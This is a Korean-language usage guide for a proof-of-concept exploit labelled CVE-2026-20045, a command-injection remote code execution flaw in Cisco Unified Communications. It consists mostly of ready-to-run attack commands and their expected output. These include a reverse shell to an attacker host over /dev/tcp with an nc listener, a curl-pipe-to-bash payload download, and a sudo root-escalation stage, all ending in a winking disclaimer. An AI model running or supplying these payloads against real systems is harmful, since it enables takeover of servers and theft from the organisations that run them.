
# CVE-2026-20045 개념 증명 익스플로잇 Cisco Unified Communications 제품군의 치명적인 인증되지 않은 RCE 취약점으로, 루트 권한 상승과 함께 명령어 주입 및 리버스 셸을 가능하게 합니다.

여러 Cisco Unified Communications 제품에 영향을 미치는 치명적인 원격 코드 실행(RCE) 취약점입니다. 패치가 배포되기 전에 실제 환경에서 적극적으로 악용되었습니다.
이는 공격자가 영향을 받는 시스템을 원격으로 완전히 장악할 수 있음을 의미합니다.
PoC 스크립트 실행을 위한 사용 예시가 포함된 정리된 가이드입니다. 취약한 Cisco Unified Communications 대상(패치되지 않은 웹 인터페이스 노출)에서 익스플로잇이 성공할 경우 터미널에 정확히 표시되는 내용을 포함합니다. 가독성을 위해 이모지, 색상 코드 블록(markdown), 구조화된 섹션을 추가했습니다. 😎
사용자 ID, 사용자 이름, 시스템 세부 정보를 가져오는 간단한 명령을 실행합니다.
명령어:
python3 CVE-2026-20045.py https://target-ucm:8443 "id && whoami && uname -a"
성공 시 표시되는 내용 (성공 출력):
[*] Sending Stage 1 injection to: https://target-ucm:8443/cucm-uds/?query=JyA7IGlkICYmIHdob2FtaSAmJiB1bmFtZSAtYSAj
[*] Initial command: id && whoami && uname -a
[+] Stage 1 likely succeeded! Status: 200
[*] Sending Stage 2 escalation to: https://target-ucm:8443/cucm-uds/?escalate=c3VkbyAtaTsgaWQgJiYgd2hvYW1pICYmIHVuYW1lIC1h
[+] Stage 2 (root escalation) likely succeeded! Status: 200
[+] Possible command output:
------------------------------------------------------------
uid=0(root) gid=0(root) groups=0(root)
root
Linux ucm-server 5.15.0-89-generic #99-Ubuntu SMP Mon Oct 30 20:44:33 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
------------------------------------------------------------
🔑 핵심 신호: 녹색 [+] 표시, HTTP 200 상태, 출력 블록의 명령 결과. 출력이 없어도 상태가 200이면 조용히 성공한 것입니다!
사용자 머신으로 대화형 셸을 생성합니다. 먼저 리스너를 시작하세요: nc -lvnp 4444.
명령어:
python3 CVE-2026-20045.py https://target-ucm:8443 "bash -i >& /dev/tcp/YOUR_IP/4444 0>&1"
성공 시 표시되는 내용 (스크립트 터미널):
[*] Sending Stage 1 injection to: https://target-ucm:8443/cucm-uds/?query=JyA7IGJhc2ggLWkgPiYgL2Rldi90Y3AvWU9VUl9JUC80NDQ0IDAmPjEgIw==
[*] Initial command: bash -i >& /dev/tcp/YOUR_IP/4444 0>&1
[+] Stage 1 likely succeeded! Status: 200
[*] Sending Stage 2 escalation to: https://target-ucm:8443/cucm-uds/?escalate=c3VkbyAtaTsgYmFzaCAtaSA+JiAvZGV2L3RjcC9ZT1VSX0lQLzQ0NDQgMD4mMQ==
[+] Stage 2 (root escalation) likely succeeded! Status: 200
[+] Command executed silently (check target for effects)
리스너(nc) 터미널에 표시되는 내용:
listening on [any] 4444 ...
connect to [YOUR_IP] from (UNKNOWN) [TARGET_IP] 54321
bash: cannot set terminal process group (1234): Inappropriate ioctl for device
bash: no job control in this shell
root@ucm-server:~# id
uid=0(root) gid=0(root) groups=0(root)
root@ucm-server:~#
🚀 핵심 신호: 스크립트에 성공 메시지 표시; 리스너에 즉시 루트 셸 프롬프트 수신. 여기에 명령을 입력하여 상호작용하세요!
서버에서 스크립트를 다운로드하여 실행합니다.
명령어:
python3 CVE-2026-20045.py https://target-ucm:8443 "curl -s http://YOUR_SERVER/payload.sh | bash"
성공 시 표시되는 내용 (성공 출력):
[*] Sending Stage 1 injection to: https://target-ucm:8443/cucm-uds/?query=JyA7IGN1cmwgLXMgaHR0cDovL1lPVVJfU0VSVkVSL3BheWxvYWQuc2ggfCBiYXNoICM=
[*] Initial command: curl -s http://YOUR_SERVER/payload.sh | bash
[+] Stage 1 likely succeeded! Status: 200
[*] Sending Stage 2 escalation to: https://target-ucm:8443/cucm-uds/?escalate=c3VkbyAtaTsgY3VybCAtcyBodHRwOi8vWU9VUl9TRVJWRVIvcGF5bG9hZC5zaCB8IGJhc2g=
[+] Stage 2 (root escalation) likely succeeded! Status: 200
[+] Command executed silently (check target for effects)
📥 핵심 신호: 200 상태 코드; 대상(예: 로그/파일 확인) 또는 서버(다운로드 로그)에서 확인. 페이로드가 조용하면 직접 출력이 없습니다.
💡 프로 팁:
sudo로 실행하세요.HTTP 관리 인터페이스에서 사용자 입력 검증이 부적절하여 명령 주입이 발생하고, 이로 인해 원격 코드 실행이 가능해집니다.
모든 PoC 코드는 승인된 시스템에서 윤리적, 교육적 목적으로만 사용됩니다. 무단 악용은 불법이며, 오용에 대한 책임은 지지 않습니다. 😈